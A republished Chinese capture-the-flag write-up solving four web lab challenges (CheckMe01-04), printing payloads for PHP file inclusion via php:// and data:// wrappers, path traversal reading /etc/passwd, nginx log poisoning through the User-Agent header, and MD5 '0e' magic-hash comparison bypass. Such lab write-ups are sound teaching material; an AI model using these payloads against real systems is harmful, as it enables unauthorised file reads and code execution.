文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

[青少年CTF]Web-CheckMe01-04 writeup by q1jun

2023-09-01 09:27

关注

0x01 CheckMe01

进入环境,随意输入字符:

image-20221002121613125

看一下代码,发现$keys = base64_decode(urldecode($keys));

说明需要先将qsnctf字符进行base64编码才能使$keys=="qsnctf"判断成立。

image-20221002121753174

所以输入:

cXNuY3Rm

得到flag

image-20221002121844048

0x02 CheckMe02

打开题目的环境,发现是文件包含题:

image-20221002122324748

通过

?url=php://filter/read=convert.base64-encode/resource=index.php

php伪协议可以查看到index.php的源码的base64:

PHRpdGxlPkNoZWNrTWUtMDI8L3RpdGxlPg0KPD9waHANCnByaW50KCI8aDE+5qyi6L+O5p2l5YiwQ2hlY2tNZS0wMu+8jOW/q+adpeWvu+aJvuS9oOeahEZsYWflubbmj5DkuqTlkKfjgII8L2gxPiIpOw0KPz4NCjw/cGhwDQplcnJvcl9yZXBvcnRpbmcoMCk7DQokdXJsPSRfR0VUWyd1cmwnXTsNCmlmKGlzc2V0KCR1cmwpKXsNCiAgICBpbmNsdWRlKCR1cmwpOw0KfQ0KICAgIA0KPz4NCjxodG1sIGxhbmc9InpoLUNOIj4NCjw/cGhwDQogICAgICAgICAgICANCiAgICAgICAgICAgICRjb2RlPSI8P3BocCBpbmNsdWRlKCQiLiJfR0VUWyd1cmwnXSk7Pz4iOw0KICAgICAgICAgICAgaGlnaGxpZ2h0X3N0cmluZygkY29kZSk7DQogICAgPz4NCg==

解码得到:

<title>CheckMe-02</title>print("

欢迎来到CheckMe-02,快来寻找你的Flag并提交吧。

"
);?>error_reporting(0);$url=$_GET['url'];if(isset($url)){ include($url);}?><html lang="zh-CN"> $code="."_GET['url']);?>"; highlight_string($code); ?>

可以看出并没有做任何过滤,试试读取phpinfo():

?url=data:text/plain,<?php phpinfo();?>

image-20221002122920746

直接读取到FLAG。

0x03 CheckMe03

打开题目环境:

image-20221002123524270

还是文件包含题目,相比于CheckMe02这题把php伪协议过滤了。

但是还是可以读取到文件,比如/etc/passwd

?text=../../../etc/passwd

image-20221002123739090

那说明还可以通过日志来解析PHP语句。

根据nginx配置文件:

?text=../../../etc/nginx/nginx.conf

image-20221002123900075

可以推测access.log文件所在位置为/var/log/nginx/access.log,这个日志文件会记录http请求日志:

?text=../../../var/log/nginx/access.log

image-20221002124036248

所以通过发送一个包含语句的http请求来写入access.log文件,这里就要用到burpsuite来拦截请求包,修改里面的User-Agent字段:

image-20221002124529654

然后再通过文件包含漏洞访问access.log日志文件:

image-20221002124615125

找到FLAG

image-20221002124646399

0x04 CheckMe04

打开题目环境:

image-20221002125008667

分析一下这段代码,变量a只能为字母,b只能为数字,然后他们各自的MD5值如果想等就输出flag。

这里通过0e截断可以做到,因为0e在是科学计数的语法,0e后面不管多大都是0

所以只需要找到两个0e开头的md5就行了

但不要忘了a只能是字母,b只能是数字:

a = QNKCDZO

md5(a) = 0e830400451993494058024219903391

b = 240610708

md5(b) = 0e462097431906509019562988736854

所以Payload:

http://xxx/?a=QNKCDZO&b=240610708

image-20221002125712512

来源地址:https://blog.csdn.net/ShangYaoPaiGu/article/details/128090156

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯